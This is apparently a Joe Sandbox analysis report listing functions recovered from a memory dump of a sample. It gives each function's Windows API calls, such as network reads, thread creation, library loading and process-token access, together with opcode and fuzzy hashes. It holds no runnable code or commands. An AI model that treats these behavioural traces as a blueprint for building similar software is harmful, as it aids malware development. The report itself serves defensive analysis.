Instruction Fuzzy Hash: 7F219231205691AFD714BB25C885F7A77A9EF85324F148158F826CB6A2C771EC42C7B0

Function 00DCCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00DCCE89
GetLastError.KERNEL32(?,00000000), ref: 00DCCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00DCCEFE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: bdf0a9f5d774633afbac531ab85006cf4fbd0765b0b39c1c2da9b4846136ffa3
Instruction ID: 6901405ae480c2025a7531e1d6e37479ee0bc83de74d868cc2d72031f17cf14f
Opcode Fuzzy Hash: bdf0a9f5d774633afbac531ab85006cf4fbd0765b0b39c1c2da9b4846136ffa3
Instruction Fuzzy Hash: 29219A719103069BDB209F65C988FAA77FCEF01314F14941EEA4AD7251E770EA458B74

Function 00DB78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8D8C
Part of subcall function 00DB8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00DB8DB2
Part of subcall function 00DB8D7D: lstrcmpiW.KERNEL32(00000000,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7923
lstrcpyW.KERNEL32(00000000,?), ref: 00DB7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7984

Strings

cdecl, xrefs: 00DB797B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8d386b5af7c448c4064abba006e4c5849d0ef98b0bc81aa5fc7aaee41b8dd318
Instruction ID: 7dfb364a0a210e4cef8e071fc742563b0e3d7332ee67f9b5adc19f18de3ce7b2
Opcode Fuzzy Hash: 8d386b5af7c448c4064abba006e4c5849d0ef98b0bc81aa5fc7aaee41b8dd318
Instruction Fuzzy Hash: 7311B43A201341EBCF15AF34D845DBA77A9FF85350B50502AF947CB264EB319811DB71

Function 00DE7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00DE7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DE7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DE7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DCB7AD,00000000), ref: 00DE7D6B

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
Instruction ID: 37953ba04fdfdcfd920328fb95b9980336a947a180cfc0cf19165153faef02f1
Opcode Fuzzy Hash: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
Instruction Fuzzy Hash: DE119031614695AFCB50AF29CC44ABA3BA5EF45360B194724F835DB2F0D7309D52DB70

Function 00DE5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00DE56BB
_wcslen.LIBCMT ref: 00DE56CD
_wcslen.LIBCMT ref: 00DE56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
Instruction ID: 6be466367b2d33451a35d5e6607788561b127ac0fd5fa015498ffe5c57e9e323
Opcode Fuzzy Hash: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
Instruction Fuzzy Hash: F311063160068996DF20BF62ECC1AEE376CEF113A8F14402AF949D6085E770CA80CF70

Function 00DB1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00DB1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A8A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
Instruction ID: c0d8add0983a57e1693458f569262e371ce01a1076bd61077817366bbc5f82fd
Opcode Fuzzy Hash: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
Instruction Fuzzy Hash: AD11273A901219FFEB109BA4C985FEDBB78EB08750F200091EA05B7290D671AE51DBA4

Function 00DBE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DBE1FD
MessageBoxW.USER32(?,?,?,?), ref: 00DBE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DBE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DBE24D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
Instruction ID: d55d36454dfed2f7f895f61b1b0753b49a5ae87ab4c5c7fe2ebd059509e1a82d
Opcode Fuzzy Hash: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
Instruction Fuzzy Hash: 52110472904354BFC711EBA89C49ADE7FADAB45320F144259F826E3391D6B0DE0587B0

Function 00D7D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00D7CFF9,00000000,00000004,00000000), ref: 00D7D218
GetLastError.KERNEL32 ref: 00D7D224
__dosmaperr.LIBCMT ref: 00D7D22B
ResumeThread.KERNEL32(00000000), ref: 00D7D249

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
Instruction ID: cded1cf207de4bfea29924b86fec6afc2ffae9ee2f0a886db96d31d921216f21
Opcode Fuzzy Hash: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
Instruction Fuzzy Hash: A301D6364153047BC7216BA5DC05BAA7A7ADF81731F248219FD29D61D1EB70C902C6B0

Function 00D5600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
GetStockObject.GDI32(00000011), ref: 00D56060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
Instruction ID: 308934239f1533e104e62f2bdc2c93f101608eeb2fd17650df6616a3ad7458d5
Opcode Fuzzy Hash: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
Instruction Fuzzy Hash: 7011AD72101648BFEF125FA8CC84EEABB69EF083A5F440205FE0496160CB32DC61DBB0

Function 00D73B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00D73B56

Part of subcall function 00D73AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D73AD2
Part of subcall function 00D73AA3: ___AdjustPointer.LIBCMT ref: 00D73AED

_UnwindNestedFrames.LIBCMT ref: 00D73B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D73B7C
CallCatchBlock.LIBVCRUNTIME ref: 00D73BA4

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 4de8c1d2a57846c143f4a4f342c5cba1e11ee3c16d3b8ecfcc74f3d3211ae116
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 6501E932100149BBDF125E95CC46EEB7B69EF58754F048018FE5C56121E732E961EBB1

Function 00D83073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D513C6,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue), ref: 00D830A5
GetLastError.KERNEL32(?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000,00000364,?,00D82E46), ref: 00D830B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000), ref: 00D830BF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
Instruction ID: 937f7dd63dfcd5009a7d0476e0b1c82a9b076347c38b7a21e1efbb6c12192f9d
Opcode Fuzzy Hash: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
Instruction Fuzzy Hash: 4001F732311322ABCB316FB99C849677B98AF05FA1B140720F90DE7280C721DA02C7F0

Function 00DB7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DB747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DB7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DB74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DB74CA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
Instruction ID: 0e3b68d5809a47966f09ea3240852f0e9ef3234406871b4bdd86e3ebf4c0b34b
Opcode Fuzzy Hash: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
Instruction Fuzzy Hash: 0211ADB1605314EBE7209F14DC48FD27BFCEB80B01F108569AA6BDA291D7B0E904DB70

Function 00DBB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB126

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
Instruction ID: cd6d5683261bd3335e42bc9651e27bf1277245bcbaf1623de98672ab0d9702bc
Opcode Fuzzy Hash: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
Instruction Fuzzy Hash: 74113C31D01728E7CF00AFA9D9986EEBB78FF1A761F104086D942B6241CBB095518B71

Function 00DB2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
Instruction ID: c1b7465361b7582feb4ec49114edfc521ff631cf8fb90d5e8d2dd9d0aa7caf62
Opcode Fuzzy Hash: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
Instruction Fuzzy Hash: 89E06D72211324BBDB202B639C4DEFB3E6CEB42BA1F441019B106D51909AA4C842C6F0

Function 00DE8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DE8887
LineTo.GDI32(?,?,?), ref: 00DE8894
EndPath.GDI32(?), ref: 00DE88A4
StrokePath.GDI32(?), ref: 00DE88B2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
Instruction ID: 765a8cdac8eed7e68db69660f68a3b79851d7cbbfc7545849a010460a0d23519
Opcode Fuzzy Hash: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
Instruction Fuzzy Hash: 52F09A36001298BADB122F95AC49FCE3B19AF06310F048000FE01A91E1C7741652DBF5

Function 00D698B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00D698CC
SetTextColor.GDI32(?,?), ref: 00D698D6
SetBkMode.GDI32(?,00000001), ref: 00D698E9
GetStockObject.GDI32(00000005), ref: 00D698F1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
Instruction ID: b626663c4bd2db92a0aae1734321ae093dcbf2187beb10f9f70594f1f03f9578
Opcode Fuzzy Hash: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
Instruction Fuzzy Hash: E0E06D31254780AADB216B78EC49BE83F20EB12336F08921AF6FA981E1C37146419F30

Function 00DB162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00DB1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DB11D9), ref: 00DB1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB164F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
Instruction ID: 874eda23c9de78df51abc23be360d661984fdb4d5af42ee0b49be28263891835
Opcode Fuzzy Hash: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
Instruction Fuzzy Hash: A6E08C36612311EBD7302FA4AE4DB8A3B7CAF447A2F188808F646CD080E7348442CB74

Function 00DAD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00DAD858
GetDC.USER32(00000000), ref: 00DAD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
ReleaseDC.USER32(?), ref: 00DAD8A3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
